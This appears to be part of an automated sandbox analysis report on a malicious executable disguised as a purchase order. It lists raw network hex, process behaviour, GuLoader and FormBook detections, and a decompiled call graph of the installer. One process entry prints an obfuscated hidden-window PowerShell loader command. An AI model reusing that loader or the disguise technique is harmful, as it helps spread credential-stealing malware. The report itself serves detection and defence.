              2024-07-26 21:55:53 UTC8000INData Raw: 62 6a d9 79 3c 41 0a 8c b5 27 10 e6 2a 46 ac 70 df 05 63 41 b0 2a b7 21 ee d7 73 03 64 a8 c2 76 dc 72 3e fd 35 37 57 90 ed 00 f5 71 de 54 00 37 5c f5 9c b6 7f 2d 31 e5 5d c5 2f a2 0e 3e 88 2b eb 5d fa c0 72 0d 5b 08 af 4e a0 3b 74 77 7a ac 09 77 31 88 4d 33 4c 2a 8d 17 f1 01 98 3c 41 28 32 48 44 2a 53 28 fc b6 9e 0d 88 01 9c 2c f7 d3 7d 77 94 b7 b7 92 f8 56 99 8a 17 b4 71 6d 5b e7 81 ab 1d 72 1f 09 fa e1 4f ef 58 0d 35 5c 6d b1 66 ea 42 c3 23 cc 1f 5c cb eb 75 5c 60 18 89 e7 48 17 01 53 18 c5 8c 79 61 1f 9b f9 75 3f 7d dc 42 48 df 33 2c 3d c9 96 ac 88 ca 9b 7c 75 9b 23 c5 66 3c 4d 89 40 7c 9a 76 b3 15 fb 5a 66 09 88 2e 0c 9e a0 b5 09 20 8c 7b a4 ff a0 d8 51 9c 80 38 c4 ff d2 c6 d7 26 18 71 39 bd da ec 96 e6 0f ae 1a ca 99 f6 70 85 de 20 32 ff f3 7c 3b bb
              Data Ascii: bjy<A'*FpcA*!sdvr>57WqT7\-1]/>+]r[N;twzw1M3L*<A(2HD*S(,}wVqm[rOX5\mfB#\u\`HSyau?}BH3,=|u#f<M@|vZf. {Q8&q9p 2|;
              2024-07-26 21:55:53 UTC8000INData Raw: e1 4a d6 e8 ca 49 10 36 cf 46 38 e5 cd 25 fe 11 e9 cf f6 00 47 89 ff e2 8c fb 5e fd 59 d2 15 96 3d 81 1e 7a 52 64 48 88 93 f8 b8 60 6a 97 68 36 48 0c 33 6a 56 a8 f8 8c 2e da 61 0f 7a 82 c7 cd 6f 8e 39 a8 15 b3 f4 ae 22 fe 94 08 93 fb 6c 05 86 fb ec 9b db b6 26 8e 93 68 f6 e3 72 a3 bb 8d 45 2e 95 f3 6f ed 53 e1 df 38 7d 71 98 30 da 61 9a 02 3b 83 a4 78 6b 80 b5 d7 0d 87 13 57 ab a0 b3 c1 1a cd 03 02 8a b1 8e 3b 5f bf b4 0d da e3 b6 42 cf d1 46 a2 f8 1c de 45 81 1f fc 90 ff 68 75 f9 a1 c6 d5 20 bd d4 29 cd 6a f5 24 a3 1c 38 0c 52 36 ed a2 d0 9e cc f8 87 15 ef d0 48 de 48 f8 5a 61 74 a0 2a 59 65 5b 0a 85 f0 f0 b7 75 89 22 a3 fc 76 f2 9c 51 4a 92 f9 96 6f 0e c2 7d 85 6e 15 c0 39 9f 5e ba 1d d5 68 9a b7 2a 1e 63 6d a4 7e 05 8d 46 73 bb 94 d2 12 bd bd 8e dd 72
              Data Ascii: JI6F8%G^Y=zRdH`jh6H3jV.azo9"l&hrE.oS8}q0a;xkW;_BFEhu )j$8R6HHZat*Ye[u"vQJo}n9^h*cm~Fsr
              2024-07-26 21:55:53 UTC8000INData Raw: 80 c9 a6 7a ef f6 cc 1f 0b 5b 2d c5 e5 67 65 89 17 b8 0d 8c 77 3f 10 d3 a9 16 e0 87 89 81 92 2d 6a de 0f 8b ac 23 06 d0 5f 02 bb 85 f0 72 1d 08 67 65 ee a8 15 8a 24 6a 39 21 70 27 b4 72 40 ab 9c 6f b8 8c 9b 17 a5 8e 11 4e 22 2d 3b 0a 8e 81 98 b6 f1 0e 2c 4e 02 ea 14 c1 33 67 e3 62 60 74 11 57 70 b5 ab e2 cc 28 d9 3d d4 ab 52 fd e5 80 4b e8 d5 b4 df e6 e7 f5 65 95 92 ac 53 ff b2 eb 3e cb 59 94 51 ff 85 a4 1c 90 09 13 9a f4 d1 15 52 52 03 87 cc f9 11 ae c9 26 be 46 35 8b 7e 7c 9a ce 34 b5 35 bc 27 25 de 07 39 4f c3 51 28 cc 50 4c e6 3c f4 b8 31 ca 41 f5 03 fd 0a 1a a5 ee c5 c4 be 75 e2 4b e2 f0 21 78 04 20 29 38 7e 9f 05 38 6f 37 be 04 22 a9 b6 f4 59 2f 10 40 37 e7 49 71 df 4c 93 6e 4d 8a 74 f1 c8 6f de 28 fb 64 fb da 43 93 2b df 46 c8 cc 6c 50 78 f3 f8 a0
              Data Ascii: z[-gew?-j#_rge$j9!p'r@oN"-;,N3gb`tWp(=RKeS>YQRR&F5~|45'%9OQ(PL<1AuK!x )8~8o7"Y/@7IqLnMto(dC+FlPx


              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:17:55:13
              Start date:26/07/2024
              Path:C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe"
              Imagebase:0x400000
              File size:876'348 bytes
              MD5 hash:D332BCAA3C61494B774F49BF3E716C21
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              General

              Target ID:2
              Start time:17:55:13
              Start date:26/07/2024
              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):true
              Commandline:"powershell.exe" -windowstyle hidden "$Typograferer=Get-Content 'C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Heptandrous.Arr';$Anskueliggjordes=$Typograferer.SubString(51945,3);.$Anskueliggjordes($Typograferer)"
              Imagebase:0xa90000
              File size:433'152 bytes
              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.76792434686.000000000AF9D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high
              Has exited:true

              General

              Target ID:3
              Start time:17:55:13
              Start date:26/07/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7cade0000
              File size:875'008 bytes
              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:4
              Start time:17:55:42
              Start date:26/07/2024
              Path:C:\Users\user\AppData\Local\Temp\Sammentrykket.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\Temp\Sammentrykket.exe"
              Imagebase:0x400000
              File size:876'348 bytes
              MD5 hash:D332BCAA3C61494B774F49BF3E716C21
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.77600228920.0000000022040000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.77600228920.0000000022040000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.77583228848.000000000360D000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              Antivirus matches:
              • Detection: 29%, ReversingLabs
              Reputation:low
              Has exited:true

              General

              Target ID:5
              Start time:17:56:39
              Start date:26/07/2024
              Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
              Imagebase:0x140000000
              File size:16'696'840 bytes
              MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.81461887155.00000000050C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.81461887155.00000000050C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
              Reputation:moderate
              Has exited:false

              General

              Target ID:8
              Start time:17:56:40
              Start date:26/07/2024
              Path:C:\Windows\SysWOW64\WerFault.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 1896
              Imagebase:0x6e0000
              File size:482'640 bytes
              MD5 hash:40A149513D721F096DDF50C04DA2F01F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Disassembly

              Reset < >

                Execution Graph

                Execution Coverage:40.5%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:21.3%
                Total number of Nodes:492
                Total number of Limit Nodes:12
                execution_graph 1851 402f93 1852 402fa5 SetTimer 1851->1852 1853 402fbe 1851->1853 1852->1853 1854 403013 1853->1854 1855 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 1853->1855 1855->1854 1270 403f77 1271 4040f0 1270->1271 1272 403f8f 1270->1272 1274 404101 GetDlgItem GetDlgItem 1271->1274 1275 404141 1271->1275 1272->1271 1273 403f9b 1272->1273 1276 403fa6 SetWindowPos 1273->1276 1277 403fb9 1273->1277 1278 404476 18 API calls 1274->1278 1279 40419b 1275->1279 1289 401389 2 API calls 1275->1289 1276->1277 1281 403fc2 ShowWindow 1277->1281 1282 404004 1277->1282 1283 40412b SetClassLongW 1278->1283 1296 4040eb 1279->1296 1343 4044c2 1279->1343 1284 403fe2 GetWindowLongW 1281->1284 1285 4040dd 1281->1285 1286 404023 1282->1286 1287 40400c DestroyWindow 1282->1287 1288 40140b 2 API calls 1283->1288 1284->1285 1291 403ffb ShowWindow 1284->1291 1382 4044dd 1285->1382 1292 404028 SetWindowLongW 1286->1292 1293 404039 1286->1293 1342 4043ff 1287->1342 1288->1275 1294 404173 1289->1294 1291->1282 1292->1296 1293->1285 1299 404045 GetDlgItem 1293->1299 1294->1279 1295 404177 SendMessageW 1294->1295 1295->1296 1297 40140b 2 API calls 1313 4041ad 1297->1313 1298 404401 DestroyWindow EndDialog 1298->1342 1301 404073 1299->1301 1302 404056 SendMessageW IsWindowEnabled 1299->1302 1300 404430 ShowWindow 1300->1296 1303 404078 1301->1303 1305 404080 1301->1305 1306 4040c7 SendMessageW 1301->1306 1307 404093 1301->1307 1302->1296 1302->1301 1379 40444f 1303->1379 1305->1303 1305->1306 1306->1285 1310 4040b0 1307->1310 1311 40409b 1307->1311 1309 404476 18 API calls 1309->1313 1315 40140b 2 API calls 1310->1315 1376 40140b 1311->1376 1312 4040ae 1312->1285 1313->1296 1313->1297 1313->1298 1313->1309 1333 404341 DestroyWindow 1313->1333 1346 406557 1313->1346 1363 404476 1313->1363 1316 4040b7 1315->1316 1316->1285 1316->1303 1318 404228 GetDlgItem 1319 404245 ShowWindow KiUserCallbackDispatcher 1318->1319 1320 40423d 1318->1320 1366 404498 KiUserCallbackDispatcher 1319->1366 1320->1319 1322 40426f EnableWindow 1327 404283 1322->1327 1323 404288 GetSystemMenu EnableMenuItem SendMessageW 1324 4042b8 SendMessageW 1323->1324 1323->1327 1324->1327 1327->1323 1367 4044ab SendMessageW 1327->1367 1368 403f58 1327->1368 1371 40651a lstrcpynW 1327->1371 1329 4042e7 lstrlenW 1330 406557 17 API calls 1329->1330 1331 4042fd SetWindowTextW 1330->1331 1372 401389 1331->1372 1334 40435b CreateDialogParamW 1333->1334 1333->1342 1335 40438e 1334->1335 1334->1342 1336 404476 18 API calls 1335->1336 1337 404399 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 1336->1337 1338 401389 2 API calls 1337->1338 1339 4043df 1338->1339 1339->1296 1340 4043e7 ShowWindow 1339->1340 1341 4044c2 SendMessageW 1340->1341 1341->1342 1342->1296 1342->1300 1344 4044da 1343->1344 1345 4044cb SendMessageW 1343->1345 1344->1313 1345->1344 1350 406564 1346->1350 1347 406787 1348 40679d 1347->1348 1412 40651a lstrcpynW 1347->1412 1348->1313 1350->1347 1351 406755 lstrlenW 1350->1351 1352 40666c GetSystemDirectoryW 1350->1352 1356 406557 10 API calls 1350->1356 1357 40667f GetWindowsDirectoryW 1350->1357 1359 4066ae SHGetSpecialFolderLocation 1350->1359 1360 4066f6 lstrcatW 1350->1360 1361 406557 10 API calls 1350->1361 1396 4063e8 1350->1396 1401 4067a1 1350->1401 1410 406461 wsprintfW 1350->1410 1411 40651a lstrcpynW 1350->1411 1351->1350 1352->1350 1356->1351 1357->1350 1359->1350 1362 4066c6 SHGetPathFromIDListW CoTaskMemFree 1359->1362 1360->1350 1361->1350 1362->1350 1364 406557 17 API calls 1363->1364 1365 404481 SetDlgItemTextW 1364->1365 1365->1318 1366->1322 1367->1327 1369 406557 17 API calls 1368->1369 1370 403f66 SetWindowTextW 1369->1370 1370->1327 1371->1329 1374 401390 1372->1374 1373 4013fe 1373->1313 1374->1373 1375 4013cb MulDiv SendMessageW 1374->1375 1375->1374 1377 401389 2 API calls 1376->1377 1378 401420 1377->1378 1378->1303 1380 404456 1379->1380 1381 40445c SendMessageW 1379->1381 1380->1381 1381->1312 1383 4044f5 GetWindowLongW 1382->1383 1393 4045a0 1382->1393 1384 40450a 1383->1384 1383->1393 1385 404537 GetSysColor 1384->1385 1386 40453a 1384->1386 1384->1393 1385->1386 1387 404540 SetTextColor 1386->1387 1388 40454a SetBkMode 1386->1388 1387->1388 1389 404562 GetSysColor 1388->1389 1390 404568 1388->1390 1389->1390 1391 404579 1390->1391 1392 40456f SetBkColor 1390->1392 1391->1393 1394 404593 CreateBrushIndirect 1391->1394 1395 40458c DeleteObject 1391->1395 1392->1391 1393->1296 1394->1393 1395->1394 1413 406387 1396->1413 1399 40644c 1399->1350 1400 40641c RegQueryValueExW RegCloseKey 1400->1399 1408 4067ae 1401->1408 1402 406829 CharPrevW 1404 406824 1402->1404 1403 406817 CharNextW 1403->1404 1403->1408 1404->1402 1405 40684a 1404->1405 1405->1350 1407 406803 CharNextW 1407->1408 1408->1403 1408->1404 1408->1407 1409 406812 CharNextW 1408->1409 1417 405e16 1408->1417 1409->1403 1410->1350 1411->1350 1412->1348 1414 406396 1413->1414 1415 40639a 1414->1415 1416 40639f RegOpenKeyExW 1414->1416 1415->1399 1415->1400 1416->1415 1419 405e1c 1417->1419 1418 405e32 1418->1408 1419->1418 1420 405e23 CharNextW 1419->1420 1420->1419 1421 40350a SetErrorMode GetVersionExW 1422 403594 1421->1422 1423 40355c GetVersionExW 1421->1423 1424 4035ed 1422->1424 1425 4068e7 5 API calls 1422->1425 1423->1422 1512 406877 GetSystemDirectoryW 1424->1512 1425->1424 1427 403603 lstrlenA 1427->1424 1428 403613 1427->1428 1515 4068e7 GetModuleHandleA 1428->1515 1431 4068e7 5 API calls 1432 403621 1431->1432 1433 4068e7 5 API calls 1432->1433 1434 40362d #17 OleInitialize SHGetFileInfoW 1433->1434 1521 40651a lstrcpynW 1434->1521 1437 40367a GetCommandLineW 1522 40651a lstrcpynW 1437->1522 1439 40368c 1440 405e16 CharNextW 1439->1440 1441 4036b2 CharNextW 1440->1441 1449 4036c3 1441->1449 1442 4037c1 1443 4037d5 GetTempPathW 1442->1443 1523 4034d9 1443->1523 1445 4037ed 1446 4037f1 GetWindowsDirectoryW lstrcatW 1445->1446 1447 403847 DeleteFileW 1445->1447 1450 4034d9 12 API calls 1446->1450 1533 40307d GetTickCount GetModuleFileNameW 1447->1533 1448 405e16 CharNextW 1448->1449 1449->1442 1449->1448 1455 4037c3 1449->1455 1452 40380d 1450->1452 1452->1447 1454 403811 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 1452->1454 1453 40385a 1461 405e16 CharNextW 1453->1461 1465 40391e 1453->1465 1497 40390f 1453->1497 1457 4034d9 12 API calls 1454->1457 1633 40651a lstrcpynW 1455->1633 1460 40383f 1457->1460 1460->1447 1460->1465 1469 40387c 1461->1469 1463 403a46 1661 405b7a 1463->1661 1464 403a5b 1467 403a63 GetCurrentProcess OpenProcessToken 1464->1467 1468 403ad9 ExitProcess 1464->1468 1654 403aef 1465->1654 1474 403aa9 1467->1474 1475 403a7a LookupPrivilegeValueW AdjustTokenPrivileges 1467->1475 1471 4038e5 1469->1471 1472 403926 1469->1472 1634 405ef1 1471->1634 1617 405ae5 1472->1617 1478 4068e7 5 API calls 1474->1478 1475->1474 1481 403ab0 1478->1481 1484 403ac5 ExitWindowsEx 1481->1484 1485 403ad2 1481->1485 1482 403947 lstrcatW lstrcmpiW 1482->1465 1486 403967 1482->1486 1483 40393c lstrcatW 1483->1482 1484->1468 1484->1485 1488 40140b 2 API calls 1485->1488 1489 403973 1486->1489 1490 40396c 1486->1490 1488->1468 1650 405ac8 CreateDirectoryW 1489->1650 1620 405a4b CreateDirectoryW 1490->1620 1491 403904 1649 40651a lstrcpynW 1491->1649 1496 403978 SetCurrentDirectoryW 1498 403995 1496->1498 1499 40398a 1496->1499 1561 403bc9 1497->1561 1625 40651a lstrcpynW 1498->1625 1653 40651a lstrcpynW 1499->1653 1502 406557 17 API calls 1503 4039d7 DeleteFileW 1502->1503 1504 4039e3 CopyFileW 1503->1504 1509 4039a2 1503->1509 1504->1509 1505 403a2d 1507 4062da 36 API calls 1505->1507 1507->1465 1508 406557 17 API calls 1508->1509 1509->1502 1509->1505 1509->1508 1511 403a17 CloseHandle 1509->1511 1626 4062da MoveFileExW 1509->1626 1630 405afd CreateProcessW 1509->1630 1511->1509 1513 406899 wsprintfW LoadLibraryExW 1512->1513 1513->1427 1516 406903 1515->1516 1517 40690d GetProcAddress 1515->1517 1519 406877 3 API calls 1516->1519 1518 40361a 1517->1518 1518->1431 1520 406909 1519->1520 1520->1517 1520->1518 1521->1437 1522->1439 1524 4067a1 5 API calls 1523->1524 1525 4034e5 1524->1525 1526 4034ef 1525->1526 1665 405de9 lstrlenW CharPrevW 1525->1665 1526->1445 1529 405ac8 2 API calls 1530 4034fd 1529->1530 1668 406039 1530->1668 1672 40600a GetFileAttributesW CreateFileW 1533->1672 1535 4030bd 1555 4030cd 1535->1555 1673 40651a lstrcpynW 1535->1673 1537 4030e3 1674 405e35 lstrlenW 1537->1674 1541 4030f4 GetFileSize 1542 4031ee 1541->1542 1546 40310b 1541->1546 1679 403019 1542->1679 1544 4031f7 1547 403227 GlobalAlloc 1544->1547 1544->1555 1714 4034c2 SetFilePointer 1544->1714 1546->1542 1548 40325a 1546->1548 1546->1555 1557 403019 6 API calls 1546->1557 1711 4034ac 1546->1711 1690 4034c2 SetFilePointer 1547->1690 1552 403019 6 API calls 1548->1552 1551 403242 1691 4032b4 1551->1691 1552->1555 1553 403210 1556 4034ac ReadFile 1553->1556 1555->1453 1558 40321b 1556->1558 1557->1546 1558->1547 1558->1555 1560 40328b SetFilePointer 1560->1555 1562 4068e7 5 API calls 1561->1562 1563 403bdd 1562->1563 1564 403be3 1563->1564 1565 403bf5 1563->1565 1743 406461 wsprintfW 1564->1743 1566 4063e8 3 API calls 1565->1566 1567 403c25 1566->1567 1569 403c44 lstrcatW 1567->1569 1571 4063e8 3 API calls 1567->1571 1570 403bf3 1569->1570 1735 403e9f 1570->1735 1571->1569 1574 405ef1 18 API calls 1575 403c76 1574->1575 1576 403d0a 1575->1576 1578 4063e8 3 API calls 1575->1578 1577 405ef1 18 API calls 1576->1577 1579 403d10 1577->1579 1580 403ca8 1578->1580 1581 403d20 LoadImageW 1579->1581 1582 406557 17 API calls 1579->1582 1580->1576 1585 403cc9 lstrlenW 1580->1585 1588 405e16 CharNextW 1580->1588 1583 403dc6 1581->1583 1584 403d47 RegisterClassW 1581->1584 1582->1581 1587 40140b 2 API calls 1583->1587 1586 403d7d SystemParametersInfoW CreateWindowExW 1584->1586 1616 403dd0 1584->1616 1589 403cd7 lstrcmpiW 1585->1589 1590 403cfd 1585->1590 1586->1583 1591 403dcc 1587->1591 1592 403cc6 1588->1592 1589->1590 1593 403ce7 GetFileAttributesW 1589->1593 1594 405de9 3 API calls 1590->1594 1597 403e9f 18 API calls 1591->1597 1591->1616 1592->1585 1596 403cf3 1593->1596 1595 403d03 1594->1595 1744 40651a lstrcpynW 1595->1744 1596->1590 1600 405e35 2 API calls 1596->1600 1598 403ddd 1597->1598 1601 403de9 ShowWindow 1598->1601 1602 403e6c 1598->1602 1600->1590 1603 406877 3 API calls 1601->1603 1745 40564f OleInitialize 1602->1745 1605 403e01 1603->1605 1609 403e0f GetClassInfoW 1605->1609 1611 406877 3 API calls 1605->1611 1606 403e72 1607 403e76 1606->1607 1608 403e8e 1606->1608 1614 40140b 2 API calls 1607->1614 1607->1616 1610 40140b 2 API calls 1608->1610 1612 403e23 GetClassInfoW RegisterClassW 1609->1612 1613 403e39 DialogBoxParamW 1609->1613 1610->1616 1611->1609 1612->1613 1615 40140b 2 API calls 1613->1615 1614->1616 1615->1616 1616->1465 1618 4068e7 5 API calls 1617->1618 1619 40392b lstrcatW 1618->1619 1619->1482 1619->1483 1621 403971 1620->1621 1622 405a9c GetLastError 1620->1622 1621->1496 1622->1621 1623 405aab SetFileSecurityW 1622->1623 1623->1621 1624 405ac1 GetLastError 1623->1624 1624->1621 1625->1509 1627 4062fb 1626->1627 1628 4062ee 1626->1628 1627->1509 1753 406160 1628->1753 1631 405b30 CloseHandle 1630->1631 1632 405b3c 1630->1632 1631->1632 1632->1509 1633->1443 1787 40651a lstrcpynW 1634->1787 1636 405f02 1788 405e94 CharNextW CharNextW 1636->1788 1639 4038f1 1639->1465 1648 40651a lstrcpynW 1639->1648 1640 4067a1 5 API calls 1646 405f18 1640->1646 1641 405f49 lstrlenW 1642 405f54 1641->1642 1641->1646 1643 405de9 3 API calls 1642->1643 1645 405f59 GetFileAttributesW 1643->1645 1645->1639 1646->1639 1646->1641 1647 405e35 2 API calls 1646->1647 1794 406850 FindFirstFileW 1646->1794 1647->1641 1648->1491 1649->1497 1651 405ad8 1650->1651 1652 405adc GetLastError 1650->1652 1651->1496 1652->1651 1653->1498 1655 403b07 1654->1655 1656 403af9 CloseHandle 1654->1656 1797 403b34 1655->1797 1656->1655 1662 405b8f 1661->1662 1663 403a53 ExitProcess 1662->1663 1664 405ba3 MessageBoxIndirectW 1662->1664 1664->1663 1666 4034f7 1665->1666 1667 405e05 lstrcatW 1665->1667 1666->1529 1667->1666 1669 406046 GetTickCount GetTempFileNameW 1668->1669 1670 40607c 1669->1670 1671 403508 1669->1671 1670->1669 1670->1671 1671->1445 1672->1535 1673->1537 1675 405e43 1674->1675 1676 4030e9 1675->1676 1677 405e49 CharPrevW 1675->1677 1678 40651a lstrcpynW 1676->1678 1677->1675 1677->1676 1678->1541 1680 403022 1679->1680 1681 40303a 1679->1681 1682 403032 1680->1682 1683 40302b DestroyWindow 1680->1683 1684 403042 1681->1684 1685 40304a GetTickCount 1681->1685 1682->1544 1683->1682 1715 406923 1684->1715 1687 403058 CreateDialogParamW ShowWindow 1685->1687 1688 40307b 1685->1688 1687->1688 1688->1544 1690->1551 1692 4032cd 1691->1692 1693 4032fb 1692->1693 1732 4034c2 SetFilePointer 1692->1732 1695 4034ac ReadFile 1693->1695 1696 403306 1695->1696 1697 403445 1696->1697 1698 403318 GetTickCount 1696->1698 1699 40324e 1696->1699 1700 403487 1697->1700 1703 403449 1697->1703 1698->1699 1707 403344 1698->1707 1699->1555 1699->1560 1702 4034ac ReadFile 1700->1702 1701 4034ac ReadFile 1701->1707 1702->1699 1703->1699 1704 4034ac ReadFile 1703->1704 1705 4060bc WriteFile 1703->1705 1704->1703 1705->1703 1706 40339a GetTickCount 1706->1707 1707->1699 1707->1701 1707->1706 1708 4033bf MulDiv wsprintfW 1707->1708 1730 4060bc WriteFile 1707->1730 1719 40557c 1708->1719 1733 40608d ReadFile 1711->1733 1714->1553 1716 406940 PeekMessageW 1715->1716 1717 403048 1716->1717 1718 406936 DispatchMessageW 1716->1718 1717->1544 1718->1716 1720 405639 1719->1720 1722 405597 1719->1722 1720->1707 1721 4055b3 lstrlenW 1724 4055c1 lstrlenW 1721->1724 1725 4055dc 1721->1725 1722->1721 1723 406557 17 API calls 1722->1723 1723->1721 1724->1720 1726 4055d3 lstrcatW 1724->1726 1727 4055e2 SetWindowTextW 1725->1727 1728 4055ef 1725->1728 1726->1725 1727->1728 1728->1720 1729 4055f5 SendMessageW SendMessageW SendMessageW 1728->1729 1729->1720 1731 4060da 1730->1731 1731->1707 1732->1693 1734 4034bf 1733->1734 1734->1546 1736 403eb3 1735->1736 1752 406461 wsprintfW 1736->1752 1738 403f24 1739 403f58 18 API calls 1738->1739 1741 403f29 1739->1741 1740 403c54 1740->1574 1741->1740 1742 406557 17 API calls 1741->1742 1742->1741 1743->1570 1744->1576 1746 4044c2 SendMessageW 1745->1746 1749 405672 1746->1749 1747 405699 1748 4044c2 SendMessageW 1747->1748 1750 4056ab OleUninitialize 1748->1750 1749->1747 1751 401389 2 API calls 1749->1751 1750->1606 1751->1749 1752->1738 1754 406190 1753->1754 1755 4061b6 GetShortPathNameW 1753->1755 1780 40600a GetFileAttributesW CreateFileW 1754->1780 1756 4062d5 1755->1756 1757 4061cb 1755->1757 1756->1627 1757->1756 1759 4061d3 wsprintfA 1757->1759 1761 406557 17 API calls 1759->1761 1760 40619a CloseHandle GetShortPathNameW 1760->1756 1762 4061ae 1760->1762 1763 4061fb 1761->1763 1762->1755 1762->1756 1781 40600a GetFileAttributesW CreateFileW 1763->1781 1765 406208 1765->1756 1766 406217 GetFileSize GlobalAlloc 1765->1766 1767 406239 1766->1767 1768 4062ce CloseHandle 1766->1768 1769 40608d ReadFile 1767->1769 1768->1756 1770 406241 1769->1770 1770->1768 1782 405f6f lstrlenA 1770->1782 1773 406258 lstrcpyA 1776 40627a 1773->1776 1774 40626c 1775 405f6f 4 API calls 1774->1775 1775->1776 1777 4062b1 SetFilePointer 1776->1777 1778 4060bc WriteFile 1777->1778 1779 4062c7 GlobalFree 1778->1779 1779->1768 1780->1760 1781->1765 1783 405fb0 lstrlenA 1782->1783 1784 405f89 lstrcmpiA 1783->1784 1785 405fb8 1783->1785 1784->1785 1786 405fa7 CharNextA 1784->1786 1785->1773 1785->1774 1786->1783 1787->1636 1789 405eb1 1788->1789 1792 405ec3 1788->1792 1791 405ebe CharNextW 1789->1791 1789->1792 1790 405ee7 1790->1639 1790->1640 1791->1790 1792->1790 1793 405e16 CharNextW 1792->1793 1793->1792 1795 406871 1794->1795 1796 406866 FindClose 1794->1796 1795->1646 1796->1795 1799 403b42 1797->1799 1798 403b0c 1801 405c26 1798->1801 1799->1798 1800 403b47 FreeLibrary GlobalFree 1799->1800 1800->1798 1800->1800 1802 405ef1 18 API calls 1801->1802 1803 405c46 1802->1803 1804 405c65 1803->1804 1805 405c4e DeleteFileW 1803->1805 1806 405d85 1804->1806 1838 40651a lstrcpynW 1804->1838 1834 403a3b OleUninitialize 1805->1834 1813 406850 2 API calls 1806->1813 1806->1834 1808 405c8b 1809 405c91 lstrcatW 1808->1809 1810 405c9e 1808->1810 1811 405ca4 1809->1811 1812 405e35 2 API calls 1810->1812 1814 405cb4 lstrcatW 1811->1814 1816 405cbf lstrlenW FindFirstFileW 1811->1816 1812->1811 1815 405daa 1813->1815 1814->1816 1817 405de9 3 API calls 1815->1817 1815->1834 1816->1806 1830 405ce1 1816->1830 1818 405db4 1817->1818 1819 405bde 5 API calls 1818->1819 1822 405dc0 1819->1822 1821 405d68 FindNextFileW 1823 405d7e FindClose 1821->1823 1821->1830 1824 405dda 1822->1824 1825 405dc4 1822->1825 1823->1806 1827 40557c 24 API calls 1824->1827 1828 40557c 24 API calls 1825->1828 1825->1834 1827->1834 1831 405dd1 1828->1831 1829 405c26 60 API calls 1836 405d32 1829->1836 1830->1821 1830->1829 1830->1836 1839 40651a lstrcpynW 1830->1839 1840 405bde 1830->1840 1833 4062da 36 API calls 1831->1833 1832 40557c 24 API calls 1832->1821 1833->1834 1834->1463 1834->1464 1835 40557c 24 API calls 1835->1836 1836->1821 1836->1832 1836->1835 1837 4062da 36 API calls 1836->1837 1837->1836 1838->1808 1839->1830 1848 405fe5 GetFileAttributesW 1840->1848 1843 405c0b 1843->1830 1844 405c01 DeleteFileW 1846 405c07 1844->1846 1845 405bf9 RemoveDirectoryW 1845->1846 1846->1843 1847 405c17 SetFileAttributesW 1846->1847 1847->1843 1849 405bea 1848->1849 1850 405ff7 SetFileAttributesW 1848->1850 1849->1843 1849->1844 1849->1845 1850->1849

                Callgraph

                • Executed
                • Not Executed
                • Opacity -> Relevance
                • Disassembly available
                callgraph 0 Function_004034C2 1 Function_004044C2 2 Function_00406A42 17 Function_00406BDF 2->17 48 Function_00406A97 2->48 3 Function_00405FC5 4 Function_00405AC8 5 Function_00403BC9 7 Function_0040564F 5->7 11 Function_00406557 5->11 20 Function_00406461 5->20 23 Function_004068E7 5->23 24 Function_004063E8 5->24 25 Function_00405DE9 5->25 29 Function_00405EF1 5->29 31 Function_00406877 5->31 43 Function_0040140B 5->43 47 Function_00405E16 5->47 53 Function_00403B19 5->53 54 Function_0040651A 5->54 55 Function_00403E9F 5->55 65 Function_00405E35 5->65 6 Function_00405A4B 7->1 40 Function_00401389 7->40 8 Function_0040444F 9 Function_00406850 10 Function_004069D4 11->11 11->20 11->24 11->54 56 Function_004067A1 11->56 12 Function_00403F58 12->11 13 Function_004034D9 13->4 18 Function_00405E60 13->18 13->25 13->56 66 Function_00406039 13->66 14 Function_004062DA 19 Function_00406160 14->19 15 Function_004044DD 16 Function_00405BDE 21 Function_00405FE5 